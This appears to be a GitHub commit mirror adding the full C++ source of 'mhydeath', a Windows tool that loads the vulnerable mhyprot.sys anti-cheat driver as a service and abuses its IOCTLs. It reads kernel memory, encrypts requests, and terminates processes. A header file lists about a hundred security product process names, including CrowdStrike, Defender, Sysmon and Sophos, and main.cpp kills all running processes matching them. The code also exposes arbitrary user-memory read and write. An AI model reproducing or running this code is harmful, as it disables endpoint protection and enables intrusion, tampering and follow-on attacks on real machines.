mirror of
https://github.com/zer0condition/mhydeath
synced 2026-08-31 14:05:51 +00:00
Add project files.
This commit is contained in:
@@ -0,0 +1,22 @@
|
||||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 17
|
||||
VisualStudioVersion = 17.6.33829.357
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mhydeath", "mhydeath\mhydeath.vcxproj", "{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Release|x64 = Release|x64
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Release|x64.ActiveCfg = Release|x64
|
||||
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Release|x64.Build.0 = Release|x64
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {74DDB47F-DFB2-4765-B988-8088E5131DB1}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
||||
@@ -0,0 +1,18 @@
|
||||
#include "file_utils.h"
|
||||
|
||||
bool file_utils::create_file_from_buffer(const std::string_view file_path, void* buffer, size_t size)
|
||||
{
|
||||
std::ofstream stream(
|
||||
file_path.data(),
|
||||
std::ios_base::out | std::ios_base::binary
|
||||
);
|
||||
|
||||
if (!stream.write((char*)buffer, size))
|
||||
{
|
||||
stream.close();
|
||||
return false;
|
||||
}
|
||||
|
||||
stream.close();
|
||||
return true;
|
||||
}
|
||||
@@ -0,0 +1,10 @@
|
||||
#pragma once
|
||||
|
||||
#include <Windows.h>
|
||||
#include <string>
|
||||
#include <fstream>
|
||||
|
||||
namespace file_utils
|
||||
{
|
||||
bool create_file_from_buffer(const std::string_view file_path, void* buffer, size_t size);
|
||||
}
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,45 @@
|
||||
#include <iostream>
|
||||
#include "mhyprotect/mhyprotect.h"
|
||||
#include "mhydeath/process_killer.h"
|
||||
|
||||
//
|
||||
// main entry point
|
||||
//
|
||||
int main(int argc, const char** argv)
|
||||
{
|
||||
//
|
||||
// clean previous instances
|
||||
//
|
||||
mhyprotect::clean();
|
||||
|
||||
//
|
||||
// initialize its service, etc
|
||||
//
|
||||
if (!mhyprotect::init())
|
||||
{
|
||||
printf("[!] failed to initialize vulnerable driver\n");
|
||||
return -1;
|
||||
}
|
||||
|
||||
//
|
||||
// initialize driver implementations
|
||||
//
|
||||
if (!mhyprotect::driver_impl::driver_init())
|
||||
{
|
||||
printf("[!] failed to initialize driver properly\n");
|
||||
mhyprotect::unload();
|
||||
return -1;
|
||||
}
|
||||
|
||||
//
|
||||
// kill edr processes
|
||||
//
|
||||
process_killer::kill_target_processes();
|
||||
|
||||
//
|
||||
// stop and delete service
|
||||
//
|
||||
mhyprotect::unload();
|
||||
|
||||
return 0;
|
||||
}
|
||||
@@ -0,0 +1,60 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||
<Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Resource Files">
|
||||
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
|
||||
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="main.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="win_utils.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="mhyprot.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="service_utils.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="file_utils.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="raw_driver.hpp">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="logger.hpp">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="win_utils.hpp">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="mhyprot.hpp">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="service_utils.hpp">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="file_utils.hpp">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="nt.hpp">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="sup.hpp">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
</Project>
|
||||
@@ -0,0 +1,77 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<VCProjectVersion>16.0</VCProjectVersion>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<ProjectGuid>{0d17a4b4-a7c4-49c0-99e3-b856f9f3b271}</ProjectGuid>
|
||||
<RootNamespace>mhyprotrootkit</RootNamespace>
|
||||
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
|
||||
<ProjectName>mhydeath</ProjectName>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v143</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="Shared">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<TargetName>$(ProjectName)64</TargetName>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<LanguageStandard>stdcpp17</LanguageStandard>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="driver_utils\file_utils.cpp" />
|
||||
<ClCompile Include="main.cpp" />
|
||||
<ClCompile Include="mhydeath\process_killer.cpp" />
|
||||
<ClCompile Include="mhyprotect\mhyprotect.cpp" />
|
||||
<ClCompile Include="service_utils\service_utils.cpp" />
|
||||
<ClCompile Include="win_utils\win_utils.cpp" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="driver_utils\file_utils.h" />
|
||||
<ClInclude Include="driver_utils\raw_driver.h" />
|
||||
<ClInclude Include="mhydeath\process_killer.h" />
|
||||
<ClInclude Include="mhyprotect\mhyprotect.h" />
|
||||
<ClInclude Include="service_utils\service_utils.h" />
|
||||
<ClInclude Include="win_utils\nt.h" />
|
||||
<ClInclude Include="win_utils\win_utils.h" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
|
||||
</ImportGroup>
|
||||
</Project>
|
||||
@@ -0,0 +1,61 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<ClCompile Include="main.cpp" />
|
||||
<ClCompile Include="driver_utils\file_utils.cpp">
|
||||
<Filter>driver_utils</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="mhyprotect\mhyprotect.cpp">
|
||||
<Filter>mhyprotect</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="win_utils\win_utils.cpp">
|
||||
<Filter>win_utils</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="service_utils\service_utils.cpp">
|
||||
<Filter>service_utils</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="mhydeath\process_killer.cpp">
|
||||
<Filter>mhydeath</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="driver_utils\file_utils.h">
|
||||
<Filter>driver_utils</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="driver_utils\raw_driver.h">
|
||||
<Filter>driver_utils</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="mhyprotect\mhyprotect.h">
|
||||
<Filter>mhyprotect</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="win_utils\win_utils.h">
|
||||
<Filter>win_utils</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="win_utils\nt.h">
|
||||
<Filter>win_utils</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="service_utils\service_utils.h">
|
||||
<Filter>service_utils</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="mhydeath\process_killer.h">
|
||||
<Filter>mhydeath</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Filter Include="driver_utils">
|
||||
<UniqueIdentifier>{9d335a62-86ee-45d5-913a-2555ee6a7d0c}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="mhyprotect">
|
||||
<UniqueIdentifier>{9fb3042c-aa4d-40f0-a84e-dc788f2e659f}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="service_utils">
|
||||
<UniqueIdentifier>{e9533c65-fd79-4f8d-ba04-d05b55af3c10}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="win_utils">
|
||||
<UniqueIdentifier>{6f02f3b9-0ae5-4320-bfdd-53bf1dc9e983}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="mhydeath">
|
||||
<UniqueIdentifier>{d516efcd-0802-4863-adfe-de1e200bcb73}</UniqueIdentifier>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
</Project>
|
||||
@@ -0,0 +1,72 @@
|
||||
#include "process_killer.h"
|
||||
|
||||
//
|
||||
// convert string to lower case so we can compare incasesensitive
|
||||
//
|
||||
wchar_t* process_killer::to_lowercase(const wchar_t* str)
|
||||
{
|
||||
wchar_t* lower_str = _wcsdup(str);
|
||||
|
||||
for (int i = 0; lower_str[i]; i++)
|
||||
lower_str[i] = towlower(lower_str[i]);
|
||||
|
||||
return lower_str;
|
||||
}
|
||||
|
||||
//
|
||||
// compare name against list
|
||||
//
|
||||
int process_killer::is_a_target(const wchar_t* name)
|
||||
{
|
||||
wchar_t* tempv = to_lowercase(name);
|
||||
|
||||
for (int i = 0; i < sizeof(process_list) / sizeof(process_list[0]); i++)
|
||||
{
|
||||
if (wcsstr(tempv, process_list[i]) != NULL)
|
||||
{
|
||||
free(tempv);
|
||||
return 1;
|
||||
}
|
||||
}
|
||||
|
||||
free(tempv);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
//
|
||||
// loop running processes and kill target processes
|
||||
//
|
||||
void process_killer::kill_target_processes()
|
||||
{
|
||||
DWORD pOutbuff = 0;
|
||||
DWORD bytesRet = 0;
|
||||
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
|
||||
|
||||
if (hSnap != INVALID_HANDLE_VALUE)
|
||||
{
|
||||
PROCESSENTRY32W ProcessEntry;
|
||||
ProcessEntry.dwSize = sizeof(ProcessEntry);
|
||||
|
||||
if (Process32FirstW(hSnap, &ProcessEntry))
|
||||
{
|
||||
do
|
||||
{
|
||||
wchar_t exeName[MAX_PATH];
|
||||
wcscpy_s(exeName, MAX_PATH, ProcessEntry.szExeFile);
|
||||
|
||||
if (process_killer::is_a_target(exeName))
|
||||
{
|
||||
if (mhyprotect::driver_impl::terminate_process(ProcessEntry.th32ProcessID)) {
|
||||
wprintf(L"Killed process: %s \n", ProcessEntry.szExeFile);
|
||||
}
|
||||
else {
|
||||
wprintf(L"Failed to kill: %s\n", ProcessEntry.szExeFile);
|
||||
}
|
||||
}
|
||||
|
||||
} while (Process32NextW(hSnap, &ProcessEntry));
|
||||
}
|
||||
CloseHandle(hSnap);
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,53 @@
|
||||
#pragma once
|
||||
#include <iostream>
|
||||
#include <Windows.h>
|
||||
#include <tlhelp32.h>
|
||||
#include "../mhyprotect/mhyprotect.h"
|
||||
|
||||
namespace process_killer {
|
||||
//
|
||||
// list of process names to kill
|
||||
//
|
||||
const wchar_t* const process_list[] =
|
||||
{
|
||||
L"activeconsole", L"anti malware", L"anti-malware",
|
||||
L"antimalware", L"anti virus", L"anti-virus",
|
||||
L"antivirus", L"appsense", L"authtap",
|
||||
L"avast", L"avecto", L"canary",
|
||||
L"carbonblack", L"carbon black", L"cb.exe",
|
||||
L"ciscoamp", L"cisco amp", L"countercept",
|
||||
L"countertack", L"cramtray", L"crssvc",
|
||||
L"crowdstrike", L"csagent", L"csfalcon",
|
||||
L"csshell", L"cybereason", L"cyclorama",
|
||||
L"cylance", L"cyoptics", L"cyupdate",
|
||||
L"cyvera", L"cyserver", L"cytray",
|
||||
L"darktrace", L"defendpoint", L"defender",
|
||||
L"eectrl", L"elastic", L"endgame",
|
||||
L"f-secure", L"forcepoint", L"fireeye",
|
||||
L"groundling", L"GRRservic", L"inspector",
|
||||
L"ivanti", L"kaspersky", L"lacuna",
|
||||
L"logrhythm", L"malware", L"mandiant",
|
||||
L"mcafee", L"morphisec", L"msascuil",
|
||||
L"msmpeng", L"nissrv", L"omni",
|
||||
L"omniagent", L"osquery", L"palo alto networks",
|
||||
L"pgeposervice", L"pgsystemtray", L"privilegeguard",
|
||||
L"procwall", L"protectorservic", L"qradar",
|
||||
L"redcloak", L"secureworks", L"securityhealthservice",
|
||||
L"semlaunchsv", L"sentinel", L"sepliveupdat",
|
||||
L"sisidsservice", L"sisipsservice", L"sisipsutil",
|
||||
L"smc.exe", L"smcgui", L"snac64",
|
||||
L"sophos", L"splunk", L"srtsp",
|
||||
L"symantec", L"symcorpu", L"symefasi",
|
||||
L"sysinternal", L"sysmon", L"tanium",
|
||||
L"tda.exe", L"tdawork", L"tpython",
|
||||
L"vectra", L"wincollect", L"windowssensor",
|
||||
L"wireshark", L"threat", L"xagt.exe",
|
||||
L"xagtnotif.exe", L"mssense"
|
||||
};
|
||||
|
||||
|
||||
wchar_t* to_lowercase(const wchar_t* str);
|
||||
int is_a_target(const wchar_t* name);
|
||||
|
||||
void kill_target_processes();
|
||||
}
|
||||
@@ -0,0 +1,241 @@
|
||||
#include "mhyprotect.h"
|
||||
|
||||
//
|
||||
// initialization of its service and device
|
||||
//
|
||||
bool mhyprotect::init()
|
||||
{
|
||||
char temp_path[MAX_PATH];
|
||||
const uint32_t length = GetTempPath(sizeof(temp_path), temp_path);
|
||||
|
||||
if (length > MAX_PATH || !length)
|
||||
return false;
|
||||
|
||||
//
|
||||
// place the driver binary into the temp path
|
||||
//
|
||||
const std::string placement_path = std::string(temp_path) + MHYPROT_SYSFILE_NAME;
|
||||
|
||||
if (std::filesystem::exists(placement_path))
|
||||
std::remove(placement_path.c_str());
|
||||
|
||||
//
|
||||
// create driver sys from memory
|
||||
//
|
||||
if (!file_utils::create_file_from_buffer(placement_path, (void*)resource::raw_driver, sizeof(resource::raw_driver)))
|
||||
return false;
|
||||
|
||||
//
|
||||
// create service using winapi, this needs administrator privileage
|
||||
//
|
||||
detail::mhyplot_service_handle = service_utils::create_service(placement_path);
|
||||
|
||||
if (!CHECK_HANDLE(detail::mhyplot_service_handle))
|
||||
return false;
|
||||
|
||||
//
|
||||
// start the service
|
||||
//
|
||||
if (!service_utils::start_service(detail::mhyplot_service_handle))
|
||||
return false;
|
||||
|
||||
//
|
||||
// open the handle of its driver device
|
||||
//
|
||||
detail::device_handle = CreateFile(TEXT(MHYPROT_DEVICE_NAME), GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, NULL, NULL);
|
||||
|
||||
if (!CHECK_HANDLE(detail::device_handle))
|
||||
return false;
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
void mhyprotect::unload()
|
||||
{
|
||||
if (detail::device_handle)
|
||||
{
|
||||
CloseHandle(detail::device_handle);
|
||||
}
|
||||
|
||||
if (detail::mhyplot_service_handle)
|
||||
{
|
||||
service_utils::stop_service(detail::mhyplot_service_handle);
|
||||
service_utils::delete_service(detail::mhyplot_service_handle);
|
||||
}
|
||||
}
|
||||
|
||||
void mhyprotect::clean()
|
||||
{
|
||||
service_utils::delete_service_with_check(MHYPROT_SERVICE_NAME);
|
||||
}
|
||||
|
||||
bool mhyprotect::driver_impl::request_ioctl(DWORD ioctl_code, LPVOID in_buffer, DWORD in_buffer_size)
|
||||
{
|
||||
//
|
||||
// allocate memory for this command result
|
||||
//
|
||||
LPVOID out_buffer = calloc(1, in_buffer_size);
|
||||
DWORD out_buffer_size;
|
||||
|
||||
if (!out_buffer)
|
||||
return false;
|
||||
|
||||
//
|
||||
// send the ioctl request
|
||||
//
|
||||
const bool result = DeviceIoControl(mhyprotect::detail::device_handle, ioctl_code, in_buffer, in_buffer_size, out_buffer, in_buffer_size, &out_buffer_size, NULL);
|
||||
|
||||
//
|
||||
// store the result
|
||||
//
|
||||
if (out_buffer_size)
|
||||
memcpy(in_buffer, out_buffer, out_buffer_size);
|
||||
|
||||
free(out_buffer);
|
||||
|
||||
return result;
|
||||
}
|
||||
|
||||
//
|
||||
// initialize driver implementations with payload encryption requirements
|
||||
//
|
||||
bool mhyprotect::driver_impl::driver_init()
|
||||
{
|
||||
//
|
||||
// the driver initializer
|
||||
//
|
||||
MHYPROT_INITIALIZE initializer;
|
||||
initializer._m_002 = 0x0BAEBAEEC;
|
||||
initializer._m_003 = 0x0EBBAAEF4FFF89042;
|
||||
|
||||
if (!request_ioctl(MHYPROT_IOCTL_INITIALIZE, &initializer, sizeof(initializer)))
|
||||
return false;
|
||||
|
||||
//
|
||||
// driver's base address in the system
|
||||
//
|
||||
uint64_t mhyprot_address = win_utils::obtain_sysmodule_address(MHYPROT_SYSFILE_NAME);
|
||||
|
||||
if (!mhyprot_address)
|
||||
return false;
|
||||
|
||||
//
|
||||
// read the pointer that points to the seedmap that used to encrypt payloads
|
||||
// the pointer on the [driver.sys + 0xA0E8]
|
||||
//
|
||||
uint64_t seedmap_address = driver_impl::read_kernel_memory<uint64_t>(mhyprot_address + MHYPROT_OFFSET_SEEDMAP);
|
||||
if (!seedmap_address)
|
||||
return false;
|
||||
|
||||
|
||||
if (!driver_impl::read_kernel_memory(seedmap_address, &detail::seedmap, sizeof(detail::seedmap)))
|
||||
{
|
||||
return false;
|
||||
}
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
//
|
||||
// generate a key for the payload
|
||||
//
|
||||
uint64_t mhyprotect::driver_impl::generate_key(uint64_t seed)
|
||||
{
|
||||
uint64_t k = ((((seed >> 29) & 0x555555555 ^ seed) & 0x38EB3FFFF6D3) << 17) ^ (seed >> 29) & 0x555555555 ^ seed;
|
||||
return ((k & 0xFFFFFFFFFFFFBF77u) << 37) ^ k ^ ((((k & 0xFFFFFFFFFFFFBF77u) << 37) ^ k) >> 43);
|
||||
}
|
||||
|
||||
//
|
||||
// encrypt the payload
|
||||
//
|
||||
void mhyprotect::driver_impl::encrypt_payload(void* payload, size_t size)
|
||||
{
|
||||
if (size % 8)
|
||||
return;
|
||||
|
||||
if (size / 8 >= 312)
|
||||
return;
|
||||
|
||||
uint64_t* p_payload = (uint64_t*)payload;
|
||||
DWORD64 key_to_base = 0;
|
||||
|
||||
for (DWORD i = 1; i < size / 8; i++)
|
||||
{
|
||||
const uint64_t key = driver_impl::generate_key(detail::seedmap[i - 1]);
|
||||
p_payload[i] = p_payload[i] ^ key ^ (key_to_base + p_payload[0]);
|
||||
key_to_base += 0x10;
|
||||
}
|
||||
}
|
||||
|
||||
//
|
||||
// read memory from the kernel using vulnerable ioctl
|
||||
//
|
||||
bool mhyprotect::driver_impl::read_kernel_memory(uint64_t address, void* buffer, size_t size)
|
||||
{
|
||||
if (!buffer)
|
||||
return false;
|
||||
|
||||
DWORD payload_size = size + sizeof(DWORD);
|
||||
PMHYPROT_KERNEL_READ_REQUEST payload = (PMHYPROT_KERNEL_READ_REQUEST)calloc(1, payload_size);
|
||||
|
||||
if (!payload)
|
||||
return false;
|
||||
|
||||
payload->header.address = address;
|
||||
payload->size = size;
|
||||
|
||||
if (!request_ioctl(MHYPROT_IOCTL_READ_KERNEL_MEMORY, payload, payload_size))
|
||||
return false;
|
||||
|
||||
if (!payload->header.result)
|
||||
{
|
||||
memcpy(buffer, (PUCHAR)payload + 4, size);
|
||||
return true;
|
||||
}
|
||||
|
||||
return false;
|
||||
}
|
||||
|
||||
bool mhyprotect::driver_impl::terminate_process(const uint32_t process_id)
|
||||
{
|
||||
MHYPROT_TERMINATE_PROCESS_REQUEST payload;
|
||||
|
||||
payload.process_id = process_id;
|
||||
|
||||
encrypt_payload(&payload, sizeof(payload));
|
||||
|
||||
if (!request_ioctl(MHYPROT_IOCTL_TERMINATE_PROCESS, &payload, sizeof(payload)) || !payload.response)
|
||||
return false;
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
bool mhyprotect::driver_impl::read_user_memory(uint32_t process_id, uint64_t address, void* buffer, size_t size)
|
||||
{
|
||||
MHYPROT_USER_READ_WRITE_REQUEST payload;
|
||||
|
||||
payload.action = MHYPROT_ACTION_READ; // action code
|
||||
payload.process_id = process_id; // target process id
|
||||
payload.address = address; // address
|
||||
payload.buffer = (uint64_t)buffer; // our buffer
|
||||
payload.size = size; // size
|
||||
|
||||
encrypt_payload(&payload, sizeof(payload));
|
||||
|
||||
return request_ioctl(MHYPROT_IOCTL_READ_WRITE_USER_MEMORY, &payload, sizeof(payload));
|
||||
}
|
||||
|
||||
bool mhyprotect::driver_impl::write_user_memory(uint32_t process_id, uint64_t address, void* buffer, size_t size)
|
||||
{
|
||||
MHYPROT_USER_READ_WRITE_REQUEST payload;
|
||||
|
||||
payload.action = MHYPROT_ACTION_WRITE; // action code
|
||||
payload.process_id = process_id; // target process id
|
||||
payload.address = (uint64_t)buffer; // our buffer
|
||||
payload.buffer = address; // destination
|
||||
payload.size = size; // size
|
||||
|
||||
encrypt_payload(&payload, sizeof(payload));
|
||||
|
||||
return request_ioctl(MHYPROT_IOCTL_READ_WRITE_USER_MEMORY, &payload, sizeof(payload));
|
||||
}
|
||||
@@ -0,0 +1,111 @@
|
||||
#pragma once
|
||||
#include <Windows.h>
|
||||
#include <fstream>
|
||||
#include <filesystem>
|
||||
|
||||
#include "../driver_utils/raw_driver.h"
|
||||
#include "../driver_utils/file_utils.h"
|
||||
#include "../service_utils/service_utils.h"
|
||||
|
||||
|
||||
|
||||
#define MHYPROT_SERVICE_NAME "mhyprotect"
|
||||
#define MHYPROT_DISPLAY_NAME "mhyprotect"
|
||||
#define MHYPROT_SYSFILE_NAME "mhyprot.sys"
|
||||
|
||||
#define MHYPROT_DEVICE_NAME "\\\\?\\\\mhyprotect"
|
||||
|
||||
#define MHYPROT_IOCTL_INITIALIZE 0x80034000
|
||||
#define MHYPROT_IOCTL_READ_KERNEL_MEMORY 0x83064000
|
||||
#define MHYPROT_IOCTL_READ_WRITE_USER_MEMORY 0x81074000
|
||||
#define MHYPROT_IOCTL_ENUM_PROCESS_MODULES 0x82054000
|
||||
#define MHYPROT_IOCTL_GET_SYSTEM_UPTIME 0x80134000
|
||||
#define MHYPROT_IOCTL_ENUM_PROCESS_THREADS 0x83024000
|
||||
#define MHYPROT_IOCTL_TERMINATE_PROCESS 0x81034000
|
||||
|
||||
#define MHYPROT_ACTION_READ 0x0
|
||||
#define MHYPROT_ACTION_WRITE 0x1
|
||||
|
||||
#define MHYPROT_OFFSET_SEEDMAP 0xA0E8
|
||||
|
||||
namespace mhyprotect
|
||||
{
|
||||
typedef struct _MHYPROT_INITIALIZE
|
||||
{
|
||||
DWORD _m_001;
|
||||
DWORD _m_002;
|
||||
DWORD64 _m_003;
|
||||
} MHYPROT_INITIALIZE, *PMHYPROT_INITIALIZE;
|
||||
|
||||
typedef struct _MHYPROT_KERNEL_READ_REQUEST
|
||||
{
|
||||
union _HEADER
|
||||
{
|
||||
DWORD result;
|
||||
DWORD64 address;
|
||||
} header;
|
||||
ULONG size;
|
||||
} MHYPROT_KERNEL_READ_REQUEST, *PMHYPROT_KERNEL_READ_REQUEST;
|
||||
|
||||
typedef struct _MHYPROT_USER_READ_WRITE_REQUEST
|
||||
{
|
||||
DWORD64 random_key;
|
||||
DWORD action;
|
||||
DWORD unknown_00;
|
||||
DWORD process_id;
|
||||
DWORD unknown_01;
|
||||
DWORD64 buffer;
|
||||
DWORD64 address;
|
||||
ULONG size;
|
||||
ULONG unknown_02;
|
||||
} MHYPROT_USER_READ_WRITE_REQUEST, *PMHYPROT_USER_READ_WRITE_REQUEST;
|
||||
|
||||
typedef struct _MHYPROT_TERMINATE_PROCESS_REQUEST
|
||||
{
|
||||
uint64_t response;
|
||||
uint32_t process_id;
|
||||
} MHYPROT_TERMINATE_PROCESS_REQUEST, * PMHYPROT_TERMINATE_PROCESS_REQUEST;
|
||||
|
||||
namespace detail
|
||||
{
|
||||
inline HANDLE device_handle;
|
||||
inline uint64_t seedmap[312];
|
||||
inline SC_HANDLE mhyplot_service_handle;
|
||||
}
|
||||
|
||||
bool init();
|
||||
void unload();
|
||||
void clean();
|
||||
|
||||
namespace driver_impl
|
||||
{
|
||||
bool request_ioctl(DWORD ioctl_code, LPVOID in_buffer, DWORD in_buffer_size);
|
||||
bool driver_init();
|
||||
uint64_t generate_key(uint64_t seed);
|
||||
void encrypt_payload(void* payload, size_t size);
|
||||
|
||||
bool read_kernel_memory(uint64_t address, void* buffer, size_t size);
|
||||
template<class T> __forceinline T read_kernel_memory(uint64_t address)
|
||||
{
|
||||
T buffer;
|
||||
read_kernel_memory(address, &buffer, sizeof(T));
|
||||
return buffer;
|
||||
}
|
||||
|
||||
bool read_user_memory(uint32_t process_id, uint64_t address, void* buffer, size_t size);
|
||||
template<class T> __forceinline T read_user_memory(uint32_t process_id, uint64_t address)
|
||||
{
|
||||
T buffer;
|
||||
read_user_memory(process_id, address, &buffer, sizeof(T));
|
||||
return buffer;
|
||||
}
|
||||
|
||||
bool write_user_memory(uint32_t process_id, uint64_t address, void* buffer, size_t size);
|
||||
template<class T> __forceinline bool write_user_memory(uint32_t process_id, uint64_t address, T value)
|
||||
{
|
||||
return write_user_memory(process_id, address, &value, sizeof(T));
|
||||
}
|
||||
|
||||
bool terminate_process(const uint32_t process_id);
|
||||
}
|
||||
}
|
||||
